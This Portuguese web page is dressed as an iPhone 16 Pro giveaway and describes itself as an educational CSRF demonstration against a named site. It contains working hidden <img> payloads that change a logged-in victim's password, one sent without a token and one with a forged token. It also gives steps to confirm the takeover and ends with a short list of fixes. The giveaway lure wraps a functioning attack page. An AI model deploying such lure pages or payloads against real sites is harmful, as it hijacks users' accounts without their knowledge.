🎁 SORTEIO IPHONE 16 PRO - Participe GRÁTIS!

🔴 DEMONSTRAÇÃO DE ATAQUE CSRF

Esta é uma página de demonstração educacional de ataque CSRF (Cross-Site Request Forgery). O site vítima (andreipvc.life) tem uma vulnerabilidade crítica:

⚠️ Vulnerabilidade Identificada:

O servidor GERA tokens CSRF
Mas NÃO VALIDA esses tokens nas requisições
Resultado: Proteção CSRF completamente INÚTIL

⏳ Pronto para executar ataque CSRF...

🎯 Método 1: Ataque via TAG <img> (Invisível)

Carrega uma "imagem" invisível que na verdade executa a ação maliciosa. O token CSRF NÃO é incluído, mas o servidor processa mesmo assim!

<!-- Código do ataque -->
<img src="https://andreipvc.life/index.php?action=change_password&new_password=HACKED_VIA_IMG" 
     style="display:none">

<!-- Note: Sem token CSRF! -->
                        

🎯 Método 2: Ataque com Token INVÁLIDO

Envia um token CSRF completamente inválido. O servidor deveria rejeitar, mas por causa da vulnerabilidade, processa normalmente.

<!-- Código do ataque -->
<img src="https://andreipvc.life/index.php?action=change_password&new_password=HACKED_INVALID_TOKEN&csrf_token=FAKE_TOKEN_123" 
     style="display:none">

<!-- Token é FAKE mas servidor aceita! -->
                        

🎯 Método 3: Ataque Múltiplo

Executa várias ações maliciosas em sequência, todas sem token válido.

📊 Como Verificar o Ataque:

Certifique-se de estar logado em andreipvc.life
Execute um dos ataques acima
Volte para andreipvc.life e recarregue a página
Veja que a senha foi alterada!
Verifique os logs em view_logs.php para análise detalhada

🛡️ Como Corrigir a Vulnerabilidade:

VALIDAR o token CSRF no servidor - não basta gerar!
Rejeitar requisições com token ausente ou inválido
Usar método POST para ações sensíveis (não GET)
Implementar SameSite=Strict nos cookies (quando possível)
Verificar o header Origin/Referer

🎁 SORTEIO ESPECIAL 🎁